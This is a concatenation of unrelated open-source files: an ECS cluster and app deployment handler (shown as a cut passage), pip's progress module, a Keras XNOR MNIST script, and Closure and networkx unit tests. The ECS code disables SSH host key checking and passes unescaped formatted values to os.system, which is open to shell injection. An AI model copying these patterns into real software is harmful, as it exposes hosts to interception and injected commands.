sudo apt-get install -y curl \n" "{create_keypair_cmd} \n" "RUN sudo curl -o /usr/local/bin/ecs-cli https://s3.amazonaws.com/amazon-ecs-cli/ecs-cli-linux-amd64-v0.6.2 \ \n" " && chmod +x /usr/local/bin/ecs-cli \ \n" " && ecs-cli configure --region {reg} --cluster {cluster} \n" " {entry_point_cmd}" ).format(create_keypair_cmd=create_keypair_cmd, reg=region, cluster=cluster_name, entry_point_cmd=entry_point_cmd) fp = open(env_store_location + "/Dockerfile.create-cluster", "w") fp.write(df) fp.close() res_data = {} res_data['env_id'] = env_id res_data['cloud_resource_id'] = cluster_name res_data['type'] = 'ecs-cluster' res_data['status'] = 'provisioning' res_id = res_db.Resource().insert(res_data) err, image_id = self.docker_handler.build_container_image(cluster_name, env_store_location + "/Dockerfile.create-cluster", df_context=env_store_location) if err: error_output = common_functions.filter_error_output(image_id) error_message = 'provisioning-failed: ' + error_output res_data['status'] = error_message res_db.Resource().update(res_id, res_data) try: ECSHandler.awshelper.delete_security_group_for_vpc(vpc_id, sec_group_id, sec_group_name) except Exception as e1: fmlogger.error(e1) error_message = error_message + " + " + str(e1) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) env_db.Environment().update(env_id, {'output_config': error_message}) return error_message err, cont_id = self.docker_handler.run_container(cluster_name) if err: error_output = common_functions.filter_error_output(err) error_message = 'provisioning-failed: ' + error_output res_data['status'] = error_message res_db.Resource().update(res_id, res_data) try: ECSHandler.awshelper.delete_security_group_for_vpc(vpc_id, sec_group_id, sec_group_name) except Exception as e1: fmlogger.error(e1) error_message = error_message + " + " + str(e1) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) env_db.Environment().update(env_id, {'output_config': error_message}) return error_message cont_id = cont_id.rstrip().lstrip() log_lines = [] error_found = False new_lines_found = True while new_lines_found: logs = self.docker_handler.get_logs(cont_id) new_lines_found, new_lines = common_functions.are_new_log_lines(logs, log_lines) log_lines.extend(new_lines) error_found, error_message = common_functions.is_error_in_log_lines(logs) if error_found: env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) return error_message else: status_message = ', '.join(log_lines) env_db.Environment().update(env_id, {'output_config': status_message, 'status': 'provisioning'}) fmlogger.debug("Checking status of ECS cluster %s" % cluster_name) is_active = False failures = '' while not is_active: try: clusters_dict = self.ecs_client.describe_clusters(clusters=[cluster_name]) registered_instances_count = clusters_dict['clusters'][0]['registeredContainerInstancesCount'] if registered_instances_count == cluster_size: is_active = True cluster_status = 'available' break # Revisit the following code. # Currently failures will never be set. We will need this only if describe_clusters ever # encounters a failure. #if 'failures' in clusters_dict: # failures = clusters_dict['failures'] # break except Exception as e: fmlogger.debug("Exception encountered in trying to describe clusters:%s" % e) time.sleep(2) res_db.Resource().update(res_id, {'status': cluster_status}) if failures: cluster_status = 'provisioning-failure' + str(failures) fmlogger.error("Failed to provision ECS cluster.") res_db.Resource().update(res_id, {'status': cluster_status}) try: ECSHandler.awshelper.delete_security_group_for_vpc(vpc_id, sec_group_id, sec_group_name) except Exception as e1: fmlogger.error(e1) error_message = error_message + " + " + str(e1) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) return cluster_status env_output_config['cluster_name'] = cluster_name env_update['output_config'] = str(env_output_config) env_db.Environment().update(env_id, env_update) env_db.Environment().update(env_id, env_update) cp_cmd = ("docker cp {cont_id}:/src/{key_file}.pem {env_dir}/.").format(cont_id=cont_id, env_dir=env_store_location, key_file=keypair_name) os.system(cp_cmd) self.docker_handler.stop_container(cluster_name) self.docker_handler.remove_container(cont_id) self.docker_handler.remove_container_image(cluster_name) env_update = {} env_output_config['key_file'] = env_store_location + "/" + keypair_name + ".pem" env_update['output_config'] = str(env_output_config) env_db.Environment().update(env_id, env_update) instance_ip_list = self._get_cluster_ips(cluster_name, env_store_location) if not instance_ip_list: error_message = "Could not get Cluster instance IP. Not continuing with the request." fmlogger.error(error_message) env_update['status'] = error_message + " Deleting the cluster." env_db.Environment().update(env_id, env_update) self.delete_cluster(env_id, env_info, '', available_cluster_name=cluster_name) return error_message else: env_output_config['cluster_ips'] = instance_ip_list env_update['status'] = cluster_status env_update['output_config'] = str(env_output_config) env_db.Environment().update(env_id, env_update) fmlogger.debug("Done creating ECS cluster %s" % cluster_name) return cluster_status def deploy_application(self, app_id, app_info): self._copy_creds(app_info) env_vars = common_functions.resolve_environment(app_id, app_info) app_details = {} app_data = {} app_details['task-familyName'] = app_info['app_name'] app_data['status'] = 'registering-task-definition' app_data['output_config'] = str(app_details) app_db.App().update(app_id, app_data) tagged_image = common_functions.get_image_uri(app_info) app_ports = common_functions.get_app_port(app_info) container_port = int(app_ports[0]) host_port = int(app_ports[1]) task_def_arn, cont_name = self._register_task_definition(app_info, tagged_image, container_port, host_port, env_vars) app_details['task_def_arn'] = [task_def_arn] app_details['cont_name'] = cont_name app_details['cluster_name'] = self._get_cluster_name(app_info['env_id']) app_details['image_name'] = [tagged_image] app_details['memory'] = common_functions.get_app_memory(app_info) app_details['app_folder_name'] = app_info['app_folder_name'] app_details['env_name'] = app_info['env_name'] app_details['container_port'] = container_port app_details['host_port'] = host_port app_data['status'] = 'creating-ecs-app-service' app_data['output_config'] = str(app_details) app_db.App().update(app_id, app_data) app_url = app_ip_url = lb_arn = target_group_arn = listener_arn = '' try: app_url, app_ip_url, lb_arn, target_group_arn, listener_arn = self._create_ecs_app_service( app_info, cont_name, task_def_arn ) except Exception as e: #exceptions.ECSServiceCreateTimeout as e: fmlogger.error(e) app_details['error'] = str(e) #e.get_message() app_data = {} app_data['output_config'] = str(app_details) app_db.App().update(app_id, app_data) return app_details['lb_arn'] = lb_arn app_details['target_group_arn'] = target_group_arn app_details['listener_arn'] = listener_arn app_details['app_url'] = app_url app_details['app_ip_url'] = app_ip_url app_data['status'] = 'ecs-app-service-created' app_data['output_config'] = str(app_details) app_db.App().update(app_id, app_data) app_data['status'] = 'waiting-for-app-to-get-ready' app_data['output_config'] = str(app_details) app_db.App().update(app_id, app_data) status = self._check_if_app_is_ready(app_id, app_ip_url, app_url) fmlogger.debug('Application URL:%s' % app_url) app_data['status'] = status app_data['output_config'] = str(app_details) app_db.App().update(app_id, app_data) def redeploy_application(self, app_id, app_info): self._copy_creds(app_info) #if app_info['env_id']: env_vars = common_functions.resolve_environment(app_id, app_info) app_obj = app_db.App().get(app_id) app_details = app_obj.output_config app_details_obj = ast.literal_eval(app_details) app_dt = {} app_dt['status'] = 'redeploying' app_dt['output_config'] = str(app_details_obj) app_db.App().update(app_id, app_dt) if 'memory' in app_details_obj: app_info['memory'] = app_details_obj['memory'] proxy_endpoint = app_details_obj['proxy_endpoint'] repo_name = app_details_obj['repo_name'] tag = str(int(round(time.time() * 1000))) app_dt['status'] = 'building-app-container' app_db.App().update(app_id, app_dt) err, output, image_name = self._build_app_container(app_info, repo_name, proxy_endpoint, tag=tag) if err: fmlogger.debug("Error encountered in building and tagging image. Not continuing with the request.") return app_dt['status'] = 'pushing-app-cont-to-ecr-repository' app_db.App().update(app_id, app_dt) tagged_image = image_name + ":" + tag err, output = self.docker_handler.push_container(tagged_image) common_functions.save_image_tag(tagged_image, app_info) if err: fmlogger.debug("Error encountered in pushing container image to ECR. Not continuing with the request.") app_dt['status'] = 'error-encountered-in-pushing-app-cont-image' app_db.App().update(app_id, app_dt) raise Exception() fmlogger.debug("Completed pushing container %s to AWS ECR" % tagged_image) current_task_def_arn = app_details_obj['task_def_arn'][-1] container_port = self._get_container_port(current_task_def_arn) host_port = 80 orig_cont_name = app_details_obj['cont_name'] app_dt['status'] = 'deregistering-current-task-ecs-app-service' app_db.App().update(app_id, app_dt) self._update_ecs_app_service(app_info, orig_cont_name, current_task_def_arn, task_desired_count=0) app_dt['status'] = 'registering-new-task-ecs-app-service' app_db.App().update(app_id, app_dt) new_task_def_arn, cont_name = self._register_task_definition(app_info, tagged_image, container_port, host_port, env_vars, cont_name=orig_cont_name) self._update_ecs_app_service(app_info, orig_cont_name, new_task_def_arn, task_desired_count=1) app_details_obj['task_def_arn'].append(new_task_def_arn) app_details_obj['image_name'].append(tagged_image) app_ip_url = app_details_obj['app_ip_url'] app_url = app_details_obj['app_url'] app_dt['status'] = 'waiting-for-app-to-get-ready' app_db.App().update(app_id, app_dt) status = self._check_if_app_is_ready(app_id, app_ip_url, app_url) app_dt['status'] = status app_db.App().update(app_id, app_dt) def delete_application(self, app_id, app_info): fmlogger.debug("Deleting Application:%s" % app_id) app_obj = app_db.App().get(app_id) try: app_details = app_obj.output_config app_details_obj = ast.literal_eval(app_details) app_details_obj['app_url'] = '' app_dt = {} app_dt['status'] = 'deleting' app_dt['output_config'] = str(app_details_obj) app_db.App().update(app_id, app_dt) try: task_def_arn_list = app_details_obj['task_def_arn'] latest_task_def_arn = task_def_arn_list[-1] cont_name = app_details_obj['cont_name'] self._update_ecs_app_service(app_info, cont_name, latest_task_def_arn, task_desired_count=0) for task_def_arn in task_def_arn_list: self._deregister_task_definition(task_def_arn) self.ecs_client.delete_service(cluster=app_details_obj['cluster_name'], service=app_obj.name) except Exception as e: fmlogger.error("Exception encountered in trying to delete ecs service %s" % e) ECSHandler.awshelper.delete_listener(app_details_obj) ECSHandler.awshelper.delete_target_group(app_details_obj) ECSHandler.awshelper.delete_load_balancer(app_details_obj) try: tagged_image_list = app_details_obj['image_name'] if tagged_image_list: for tagged_image in tagged_image_list: self.docker_handler.remove_container_image(tagged_image) except Exception as e: fmlogger.error("Exception encountered while deleting images %s" % e) except Exception as e: fmlogger.error("Exception encountered while deleting images %s" % e) app_db.App().delete(app_id) def _retrieve_runtime_logs(self, cluster_ip, app_name, logs_path, df_dir, pem_file_name): runtime_log = cluster_ip + constants.RUNTIME_LOG runtime_log_path = logs_path + "/" + runtime_log mkdir_command = ("mkdir {logs_path}").format(logs_path=runtime_log_path) fmlogger.debug(mkdir_command) os.system(mkdir_command) app_obj = app_db.App().get_by_name(app_name) output_config = ast.literal_eval(app_obj.output_config) tagged_images = output_config['image_name'] image = tagged_images[0] dockerlogs_sh = "dockerlogs.sh" if not os.path.exists(df_dir + "/" + dockerlogs_sh): fp = open(df_dir + "/" + dockerlogs_sh, "w") file_content = ("#!/bin/bash \n" "sudo docker ps | grep {image} | awk '{{print $1}}' | xargs docker logs \n" ).format(image=image) fp.write(file_content) fp.flush() fp.close() ssh_wrapper = "ssh_wrapper.sh" ssh_wrapper_path = df_dir + "/" + ssh_wrapper if not os.path.exists(ssh_wrapper_path): fp = open(ssh_wrapper_path, "w") file_content = ("#!/bin/bash \n" "ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i " "/root/.ssh/{pem_file_name} ec2-user@{cluster_ip} 'bash -s' < {dockerlogs_sh}").format( pem_file_name=pem_file_name, cluster_ip=cluster_ip, dockerlogs_sh=dockerlogs_sh) fp.write(file_content) fp.flush() fp.close() change_perm_command = ("chmod +x {ssh_wrapper_path}").format(ssh_wrapper_path=ssh_wrapper_path) os.system(change_perm_command) dockerfile_name = "Dockerfile.retrieve-logs-" + runtime_log df_path = df_dir + "/" + dockerfile_name if not os.path.exists(df_path): df = self.docker_handler.get_dockerfile_snippet("aws") df = df + ("COPY . /src \n" "WORKDIR /src \n" "RUN sudo apt-get install -y openssh-client \n" "RUN cp -r aws-creds $HOME/.aws \ \n" " && mkdir /root/.ssh \ \n" " && cp /src/{pem_file_name} /root/.ssh/. \ \n" " && chmod 400 /root/.ssh/{pem_file_name} \ \n" " && ./ssh_wrapper.sh" ).format(pem_file_name=pem_file_name) fp = open(df_path, "w") fp.write(df) fp.flush() fp.close() log_cont_name = ("{app_name}-{cluster_ip}-retrieve-run-logs").format(app_name=app_name, cluster_ip=cluster_ip) err, output = self.docker_handler.build_container_image(log_cont_name, df_path, df_context=df_dir) if not err: filtered_output = self.docker_handler.filter_output(output) log_output_string = '\n'.join(filtered_output) fp2 = open(runtime_log_path + "/runtime.log", "w") fp2.write(log_output_string) fp2.flush() fp2.close() self.docker_handler.remove_container_image(log_cont_name) return runtime_log_path def _retrieve_deploy_logs(self, cluster_ip, app_name, logs_path, df_dir, pem_file_name): deploy_log = cluster_ip + constants.DEPLOY_LOG deploy_log_path = logs_path + "/" + deploy_log mkdir_command = ("mkdir {logs_path}").format(logs_path=deploy_log_path) fmlogger.debug(mkdir_command) os.system(mkdir_command) logs_path_cont = '/src/' + deploy_log scp_cmd = ("ENTRYPOINT [\"scp\", \"-rp\", \"-o\", \"UserKnownHostsFile=/dev/null\", \"-o\", \"StrictHostKeyChecking=no\", " "\"-i\", \"/root/.ssh/{pem_file_name}\", \"ec2-user@{public_ip}:/var/log/ecs\", \"{logs_path}\" ]" ).format(pem_file_name=pem_file_name, public_ip=cluster_ip, logs_path=".") dockerfile_name = "Dockerfile.retrieve-logs-" + deploy_log df_path = df_dir + "/" + dockerfile_name if not os.path.exists(df_path): df = self.docker_handler.get_dockerfile_snippet("aws") df = df + ("COPY . /src \n" "WORKDIR /src \n" "RUN sudo apt-get install -y openssh-client \n" "RUN cp -r aws-creds $HOME/.aws \ \n" " && mkdir /root/.ssh \ \n" " && cp /src/{pem_file_name} /root/.ssh/. \ \n" " && chmod 400 /root/.ssh/{pem_file_name} \n" " {scp_command}" ).format(pem_file_name=pem_file_name, scp_command=scp_cmd) fp = open(df_path, "w") fp.write(df) fp.flush() fp.close() log_cont_name = ("{app_name}-{cluster_ip}-retrieve-deploy-logs").format(app_name=app_name, cluster_ip=cluster_ip) err, output = self.docker_handler.build_container_image(log_cont_name, df_path, df_context=df_dir) if not err: run_err, run_output = self.docker_handler.run_container(log_cont_name) if not run_err: logs_cont_id = run_output.strip() time.sleep(5) # Allow time to retrieve the logs logs_cp_cmd = ("docker cp {cont_id}:{logs_path_cont} {logs_path}/").format(cont_id=logs_cont_id, logs_path_cont="/src/ecs", logs_path=deploy_log_path) fmlogger.debug(logs_cp_cmd) os.system(logs_cp_cmd) self.docker_handler.stop_container(logs_cont_id) self.docker_handler.remove_container(logs_cont_id) self.docker_handler.remove_container_image(log_cont_name) return deploy_log_path def _retrieve_logs(self, app_info): env_obj = env_db.Environment().get(app_info['env_id']) env_output_config = ast.literal_eval(env_obj.output_config) cluster_ips = env_output_config['cluster_ips'] cluster_name = env_output_config['cluster_name'] pem_file = env_output_config['key_file'] app_name = app_info['app_name'] app_location = app_info['app_location'] self._copy_creds(app_info, provided_df_dir=app_location) df_dir = app_location logs_path = app_info['app_location'] + "/logs" logs_path_cmd = ("mkdir {logs_path}").format(logs_path=logs_path) os.system(logs_path_cmd) pem_file_name = ("{cluster_name}.pem").format(cluster_name=cluster_name) copy_pem_file = ("cp {pem_file} {df_dir}/{pem_file_name}").format(pem_file=pem_file, df_dir=df_dir, pem_file_name=pem_file_name) fmlogger.debug(copy_pem_file) os.system(copy_pem_file) logs_path_list = [] for cluster_ip in cluster_ips: deploy_logs_path = self._retrieve_deploy_logs(cluster_ip, app_name, logs_path, df_dir, pem_file_name) runtime_logs_path = self._retrieve_runtime_logs(cluster_ip, app_name, logs_path, df_dir, pem_file_name) logs_path_list.append(deploy_logs_path) logs_path_list.append(runtime_logs_path) return logs_path_list def get_logs(self, app_id, app_info): fmlogger.debug("Retrieving logs for application %s %s" % (app_id, app_info['app_name'])) logs_path_list = self._retrieve_logs(app_info) return logs_path_list def run_command(self, env_id, env_name, resource_obj, command): fmlogger.debug("Running command against ECS cluster") if command.lower() == 'help': return ECSHandler.help_commands command_output = '' is_supported_command = self._verify(command) if not is_supported_command: command_output = ["Command not supported"] return command_output command_output = ECSHandler.awshelper.run_command(env_id, env_name, resource_obj, command) output_lines = command_output.split("\n") return output_lines
apache-2.0
ehsangolshani/crazy-hamster
.venv/lib/python3.5/site-packages/pip-9.0.1-py3.5.egg/pip/_vendor/progress/__init__.py
916
3023
# Copyright (c) 2012 Giorgos Verigakis <verigak@gmail.com> # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. from __future__ import division from collections import deque from datetime import timedelta from math import ceil from sys import stderr from time import time __version__ = '1.2' class Infinite(object): file = stderr sma_window = 10 def __init__(self, *args, **kwargs): self.index = 0 self.start_ts = time() self._ts = self.start_ts self._dt = deque(maxlen=self.sma_window) for key, val in kwargs.items(): setattr(self, key, val) def __getitem__(self, key): if key.startswith('_'): return None return getattr(self, key, None) @property def avg(self): return sum(self._dt) / len(self._dt) if self._dt else 0 @property def elapsed(self): return int(time() - self.start_ts) @property def elapsed_td(self): return timedelta(seconds=self.elapsed) def update(self): pass def start(self): pass def finish(self): pass def next(self, n=1): if n > 0: now = time() dt = (now - self._ts) / n self._dt.append(dt) self._ts = now self.index = self.index + n self.update() def iter(self, it): for x in it: yield x self.next() self.finish() class Progress(Infinite): def __init__(self, *args, **kwargs): super(Progress, self).__init__(*args, **kwargs) self.max = kwargs.get('max', 100) @property def eta(self): return int(ceil(self.avg * self.remaining)) @property def eta_td(self): return timedelta(seconds=self.eta) @property def percent(self): return self.progress * 100 @property def progress(self): return min(1, self.index / self.max) @property def remaining(self): return max(self.max - self.index, 0) def start(self): self.update() def goto(self, index): incr = index - self.index self.next(incr) def iter(self, it): try: self.max = len(it) except TypeError: pass for x in it: yield x self.next() self.finish()
gpl-3.0
DingKe/nn_playground
xnornet/mnist_mlp.py
1
2693
'''Trains a simple xnor fully connected NN on the MNIST dataset. Modified from keras' examples/mnist_mlp.py Gets to 97.41% test accuracy after 20 epochs using tensorflow backend ''' from __future__ import print_function import numpy as np np.random.seed(1337) # for reproducibility import keras.backend as K from keras.datasets import mnist from keras.models import Sequential from keras.layers import Dense, Dropout, Activation, BatchNormalization from keras.optimizers import SGD, Adam, RMSprop from keras.callbacks import LearningRateScheduler from keras.utils import np_utils from xnor_layers import XnorDense batch_size = 100 epochs = 20 classes = 10 H = 'Glorot' kernel_lr_multiplier = 'Glorot' # network num_unit = 2048 num_hidden = 3 use_bias = False # learning rate schedule lr_start = 1e-3 lr_end = 1e-4 lr_decay = (lr_end / lr_start)**(1. / epochs) # BN epsilon = 1e-6 momentum = 0.9 # dropout drop_in = 0 #0.2 drop_hidden = 0# 0.5 # the data, shuffled and split between train and test sets (X_train, y_train), (X_test, y_test) = mnist.load_data() X_train = X_train.reshape(60000, 784) X_test = X_test.reshape(10000, 784) X_train = X_train.astype('float32') X_test = X_test.astype('float32') X_train /= 255 X_test /= 255 print(X_train.shape[0], 'train samples') print(X_test.shape[0], 'test samples') # convert class vectors to binary class matrices Y_train = np_utils.to_categorical(y_train, classes) * 2 - 1 # -1 or 1 for hinge loss Y_test = np_utils.to_categorical(y_test, classes) * 2 - 1 model = Sequential() model.add(Dropout(drop_in, input_shape=(784,), name='drop0')) for i in range(num_hidden): model.add(XnorDense(num_unit, H=H, kernel_lr_multiplier=kernel_lr_multiplier, use_bias=use_bias, name='dense{}'.format(i+1))) model.add(BatchNormalization(epsilon=epsilon, momentum=momentum, name='bn{}'.format(i+1))) model.add(Activation('relu', name='act{}'.format(i+1))) model.add(Dropout(drop_hidden, name='drop{}'.format(i+1))) model.add(XnorDense(10, H=H, kernel_lr_multiplier=kernel_lr_multiplier, use_bias=use_bias, name='dense')) model.add(BatchNormalization(epsilon=epsilon, momentum=momentum, name='bn')) model.summary() opt = Adam(lr=lr_start) model.compile(loss='squared_hinge', optimizer=opt, metrics=['acc']) lr_scheduler = LearningRateScheduler(lambda e: lr_start * lr_decay ** e) history = model.fit(X_train, Y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(X_test, Y_test), callbacks=[lr_scheduler]) score = model.evaluate(X_test, Y_test, verbose=0) print('Test score:', score[0]) print('Test accuracy:', score[1])
mit
henriquespedro/Autarquia-Livre
vendor/openlayers/closure-library/closure/bin/build/depstree_test.py
354
3692
#!/usr/bin/env python # # Copyright 2009 The Closure Library Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Unit test for depstree.""" __author__ = 'nnaze@google.com (Nathan Naze)' import unittest import depstree def _GetProvides(sources): """Get all namespaces provided by a collection of sources.""" provides = set() for source in sources: provides.update(source.provides) return provides class MockSource(object): """Mock Source file.""" def __init__(self, provides, requires): self.provides = set(provides) self.requires = set(requires) def __repr__(self): return 'MockSource %s' % self.provides class DepsTreeTestCase(unittest.TestCase): """Unit test for DepsTree. Tests several common situations and errors.""" def AssertValidDependencies(self, deps_list): """Validates a dependency list. Asserts that a dependency list is valid: For every source in the list, ensure that every require is provided by a source earlier in the list. Args: deps_list: A list of sources that should be in dependency order. """ for i in range(len(deps_list)): source = deps_list[i] previous_provides = _GetProvides(deps_list[:i]) for require in source.requires: self.assertTrue( require in previous_provides, 'Namespace "%s" not provided before required by %s' % ( require, source)) def testSimpleDepsTree(self): a = MockSource(['A'], ['B', 'C']) b = MockSource(['B'], []) c = MockSource(['C'], ['D']) d = MockSource(['D'], ['E']) e = MockSource(['E'], []) tree = depstree.DepsTree([a, b, c, d, e]) self.AssertValidDependencies(tree.GetDependencies('A')) self.AssertValidDependencies(tree.GetDependencies('B')) self.AssertValidDependencies(tree.GetDependencies('C')) self.AssertValidDependencies(tree.GetDependencies('D')) self.AssertValidDependencies(tree.GetDependencies('E')) def testCircularDependency(self): # Circular deps a = MockSource(['A'], ['B']) b = MockSource(['B'], ['C']) c = MockSource(['C'], ['A']) tree = depstree.DepsTree([a, b, c]) self.assertRaises(depstree.CircularDependencyError, tree.GetDependencies, 'A') def testRequiresUndefinedNamespace(self): a = MockSource(['A'], ['B']) b = MockSource(['B'], ['C']) c = MockSource(['C'], ['D']) # But there is no D. def MakeDepsTree(): return depstree.DepsTree([a, b, c]) self.assertRaises(depstree.NamespaceNotFoundError, MakeDepsTree) def testDepsForMissingNamespace(self): a = MockSource(['A'], ['B']) b = MockSource(['B'], []) tree = depstree.DepsTree([a, b]) # There is no C. self.assertRaises(depstree.NamespaceNotFoundError, tree.GetDependencies, 'C') def testMultipleRequires(self): a = MockSource(['A'], ['B']) b = MockSource(['B'], ['C']) c = MockSource(['C'], []) d = MockSource(['D'], ['B']) tree = depstree.DepsTree([a, b, c, d]) self.AssertValidDependencies(tree.GetDependencies(['D', 'A'])) if __name__ == '__main__': unittest.main()
gpl-2.0
cogeorg/black_rhino
examples/firesales_SA/networkx/algorithms/isomorphism/tests/test_vf2userfunc.py
97
6665
""" Tests for VF2 isomorphism algorithm for weighted graphs. """ from nose.tools import assert_true, assert_false from operator import eq import networkx as nx import networkx.algorithms.isomorphism as iso def test_simple(): # 16 simple tests w = 'weight' edges = [(0,0,1),(0,0,1.5),(0,1,2),(1,0,3)] for g1 in [nx.Graph(), nx.DiGraph(), nx.MultiGraph(), nx.MultiDiGraph(), ]: g1.add_weighted_edges_from(edges) g2 = g1.subgraph(g1.nodes()) if g1.is_multigraph(): em = iso.numerical_multiedge_match('weight', 1) else: em = iso.numerical_edge_match('weight', 1) assert_true( nx.is_isomorphic(g1,g2,edge_match=em) ) for mod1, mod2 in [(False, True), (True, False), (True, True)]: # mod1 tests a regular edge # mod2 tests a selfloop if g2.is_multigraph(): if mod1: data1 = {0:{'weight':10}} if mod2: data2 = {0:{'weight':1},1:{'weight':2.5}} else: if mod1: data1 = {'weight':10} if mod2: data2 = {'weight':2.5} g2 = g1.subgraph(g1.nodes()) if mod1: if not g1.is_directed(): g2.adj[1][0] = data1 g2.adj[0][1] = data1 else: g2.succ[1][0] = data1 g2.pred[0][1] = data1 if mod2: if not g1.is_directed(): g2.adj[0][0] = data2 else: g2.succ[0][0] = data2 g2.pred[0][0] = data2 assert_false(nx.is_isomorphic(g1,g2,edge_match=em)) def test_weightkey(): g1 = nx.DiGraph() g2 = nx.DiGraph() g1.add_edge('A','B', weight=1) g2.add_edge('C','D', weight=0) assert_true( nx.is_isomorphic(g1, g2) ) em = iso.numerical_edge_match('nonexistent attribute', 1) assert_true( nx.is_isomorphic(g1, g2, edge_match=em) ) em = iso.numerical_edge_match('weight', 1) assert_false( nx.is_isomorphic(g1, g2, edge_match=em) ) g2 = nx.DiGraph() g2.add_edge('C','D') assert_true( nx.is_isomorphic(g1, g2, edge_match=em) ) class TestNodeMatch_Graph(object): def setUp(self): self.g1 = nx.Graph() self.g2 = nx.Graph() self.build() def build(self): self.nm = iso.categorical_node_match('color', '') self.em = iso.numerical_edge_match('weight', 1) self.g1.add_node('A', color='red') self.g2.add_node('C', color='blue') self.g1.add_edge('A','B', weight=1) self.g2.add_edge('C','D', weight=1) def test_noweight_nocolor(self): assert_true( nx.is_isomorphic(self.g1, self.g2) ) def test_color1(self): assert_false( nx.is_isomorphic(self.g1, self.g2, node_match=self.nm) ) def test_color2(self): self.g1.node['A']['color'] = 'blue' assert_true( nx.is_isomorphic(self.g1, self.g2, node_match=self.nm) ) def test_weight1(self): assert_true( nx.is_isomorphic(self.g1, self.g2, edge_match=self.em) ) def test_weight2(self): self.g1.add_edge('A', 'B', weight=2) assert_false( nx.is_isomorphic(self.g1, self.g2, edge_match=self.em) ) def test_colorsandweights1(self): iso = nx.is_isomorphic(self.g1, self.g2, node_match=self.nm, edge_match=self.em) assert_false(iso) def test_colorsandweights2(self): self.g1.node['A']['color'] = 'blue' iso = nx.is_isomorphic(self.g1, self.g2, node_match=self.nm, edge_match=self.em) assert_true(iso) def test_colorsandweights3(self): # make the weights disagree self.g1.add_edge('A', 'B', weight=2) assert_false( nx.is_isomorphic(self.g1, self.g2, node_match=self.nm, edge_match=self.em) ) class TestEdgeMatch_MultiGraph(object): def setUp(self): self.g1 = nx.MultiGraph() self.g2 = nx.MultiGraph() self.GM = iso.MultiGraphMatcher self.build() def build(self): g1 = self.g1 g2 = self.g2 # We will assume integer weights only. g1.add_edge('A', 'B', color='green', weight=0, size=.5) g1.add_edge('A', 'B', color='red', weight=1, size=.35) g1.add_edge('A', 'B', color='red', weight=2, size=.65) g2.add_edge('C', 'D', color='green', weight=1, size=.5) g2.add_edge('C', 'D', color='red', weight=0, size=.45) g2.add_edge('C', 'D', color='red', weight=2, size=.65) if g1.is_multigraph(): self.em = iso.numerical_multiedge_match('weight', 1) self.emc = iso.categorical_multiedge_match('color', '') self.emcm = iso.categorical_multiedge_match(['color', 'weight'], ['', 1]) self.emg1 = iso.generic_multiedge_match('color', 'red', eq) self.emg2 = iso.generic_multiedge_match(['color', 'weight', 'size'], ['red', 1, .5], [eq, eq, iso.matchhelpers.close]) else: self.em = iso.numerical_edge_match('weight', 1) self.emc = iso.categorical_edge_match('color', '') self.emcm = iso.categorical_edge_match(['color', 'weight'], ['', 1]) self.emg1 = iso.generic_multiedge_match('color', 'red', eq) self.emg2 = iso.generic_edge_match(['color', 'weight', 'size'], ['red', 1, .5], [eq, eq, iso.matchhelpers.close]) def test_weights_only(self): assert_true( nx.is_isomorphic(self.g1, self.g2, edge_match=self.em) ) def test_colors_only(self): gm = self.GM(self.g1, self.g2, edge_match=self.emc) assert_true( gm.is_isomorphic() ) def test_colorsandweights(self): gm = self.GM(self.g1, self.g2, edge_match=self.emcm) assert_false( gm.is_isomorphic() ) def test_generic1(self): gm = self.GM(self.g1, self.g2, edge_match=self.emg1) assert_true( gm.is_isomorphic() ) def test_generic2(self): gm = self.GM(self.g1, self.g2, edge_match=self.emg2) assert_false( gm.is_isomorphic() ) class TestEdgeMatch_DiGraph(TestNodeMatch_Graph): def setUp(self): self.g1 = nx.DiGraph() self.g2 = nx.DiGraph() self.build() class TestEdgeMatch_MultiDiGraph(TestEdgeMatch_MultiGraph): def setUp(self): self.g1 = nx.MultiDiGraph() self.g2 = nx.MultiDiGraph() self.GM = iso.MultiDiGraphMatcher self.build()
gpl-3.0
lmjohns3/cube-experiment
analysis/10-extract-jacobian-chunks.py
1
1827
import climate import gzip import io import joblib import lmj.cubes import logging import numpy as np import os TARGETS = '0123456789ab' def extract(trial, root, output, frames): fn = trial.root.replace(root, output).replace('.csv.gz', '') def save(df, targets, key): if not os.path.isdir(os.path.dirname(fn)): os.makedirs(os.path.dirname(fn)) out = fn + '_{}_{}.csv.gz'.format(targets, key) s = io.StringIO() df.to_csv(s, index_label='time') with gzip.open(out, 'w') as handle: handle.write(s.getvalue().encode('utf-8')) logging.info('%s: %s', out, df.shape) trial.load() body = lmj.cubes.Trial(trial.parent, trial.basename) body.df = trial.df.copy() body.make_body_relative() body.add_velocities() goal = lmj.cubes.Trial(trial.parent, trial.basename) goal.df = trial.df.copy() goal.make_target_relative() goal.add_velocities() _, jac = trial.jacobian(frames) for t, target in enumerate(TARGETS): mask = trial.df.target == t if np.sum(mask) > 0: sources = trial.df[mask].source.unique() assert len(sources) == 1 tgt = '{}{}'.format(TARGETS[int(sources[0])], target) save(body.df[mask], tgt, 'body') save(goal.df[mask], tgt, 'goal') save(jac[mask], tgt, 'jac') 